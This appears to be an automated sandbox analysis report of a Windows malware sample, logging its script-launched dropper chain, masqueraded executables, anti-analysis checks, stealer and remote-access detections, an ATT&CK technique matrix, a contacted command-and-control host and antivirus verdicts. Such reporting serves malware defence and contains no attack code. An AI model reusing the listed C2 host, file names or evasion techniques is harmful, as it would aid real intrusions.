            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exe TID: 5176Thread sleep count: 2346 > 30
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 5720Thread sleep count: 1143 > 30
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 3028Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 4716Thread sleep count: 1491 > 30
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 5100Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 1668Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 5748Thread sleep count: 1035 > 30
            Source: C:\Recovery\explorer.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 2200Thread sleep count: 1161 > 30
            Source: C:\Recovery\explorer.exe TID: 5532Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWindow / User API: threadDelayed 2346
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeWindow / User API: threadDelayed 1143
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeWindow / User API: threadDelayed 1491
            Source: C:\Recovery\explorer.exeWindow / User API: threadDelayed 1035
            Source: C:\Recovery\explorer.exeWindow / User API: threadDelayed 1161
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007DD72 VirtualQuery,GetSystemInfo,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008AAA8 FindFirstFileExA,
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\cDouNOFXle.exeAPI call chain: ExitProcess graph end node
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: chainsavesref.exe, 00000006.00000003.288512919.000000001B7B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\]0m
            Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S46gOr4pcmbmd
            Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q91sUD2WLKC
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.364421521.000000001C070000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008B710 GetProcessHeap,
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess token adjusted: Debug
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeProcess token adjusted: Debug
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeProcess token adjusted: Debug
            Source: C:\Recovery\explorer.exeProcess token adjusted: Debug
            Source: C:\Recovery\explorer.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008753D mov eax, dword ptr fs:[00000030h]
            Source: C:\comproviderRuntimecommon\chainsavesref.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007F063 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess created: unknown unknown
            Source: C:\comproviderRuntimecommon\chainsavesref.exeQueries volume information: C:\comproviderRuntimecommon\chainsavesref.exe VolumeInformation
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeQueries volume information: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe VolumeInformation
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeQueries volume information: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe VolumeInformation
            Source: C:\Recovery\explorer.exeQueries volume information: C:\Recovery\explorer.exe VolumeInformation
            Source: C:\Recovery\explorer.exeQueries volume information: C:\Recovery\explorer.exe VolumeInformation
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: GetLocaleInfoW,GetNumberFormatW,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007ED5B cpuid
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006ACF5 GetVersionExW,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts11
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            11
            Process Injection
            221
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Scheduled Task/Job
            Logon Script (Windows)1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts11
            Scripting
            Logon Script (Mac)Logon Script (Mac)11
            Process Injection
            NTDS21
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common11
            Scripting
            Cached Domain Credentials1
            Remote System Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSync2
            File and Directory Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
            Software Packing
            Proc Filesystem37
            System Information Discovery
            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            DLL Side-Loading
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 679544 Sample: cDouNOFXle.exe Startdate: 06/08/2022 Architecture: WINDOWS Score: 100 43 Antivirus detection for dropped file 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 6 other signatures 2->49 8 cDouNOFXle.exe 3 6 2->8         started        11 MrsUvRPGeImAhc.exe 14 2 2->11         started        15 explorer.exe 2->15         started        17 25 other processes 2->17 process3 dnsIp4 37 C:\...\chainsavesref.exe, PE32 8->37 dropped 39 C:\...\et1pu6VAlkUOY7GuC90A.vbe, data 8->39 dropped 19 wscript.exe 1 8->19         started        41 a0702220.xsph.ru 141.8.195.65, 49779, 80 SPRINTHOSTRU Russian Federation 11->41 59 Antivirus detection for dropped file 11->59 61 Multi AV Scanner detection for dropped file 11->61 63 Machine Learning detection for dropped file 11->63 file5 signatures6 process7 process8 21 cmd.exe 1 19->21         started        process9 23 chainsavesref.exe 1 20 21->23         started        27 conhost.exe 21->27         started        file10 29 C:\...\backgroundTaskHost.exe, PE32 23->29 dropped 31 C:\...\RuntimeBroker.exe, PE32 23->31 dropped 33 C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe, PE32 23->33 dropped 35 5 other malicious files 23->35 dropped 51 Antivirus detection for dropped file 23->51 53 Multi AV Scanner detection for dropped file 23->53 55 Machine Learning detection for dropped file 23->55 57 2 other signatures 23->57 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            cDouNOFXle.exe54%VirustotalBrowse
            cDouNOFXle.exe40%MetadefenderBrowse
            cDouNOFXle.exe60%ReversingLabsByteCode-MSIL.Backdoor.LightStone
            cDouNOFXle.exe100%AviraVBS/Runner.VPG
            cDouNOFXle.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
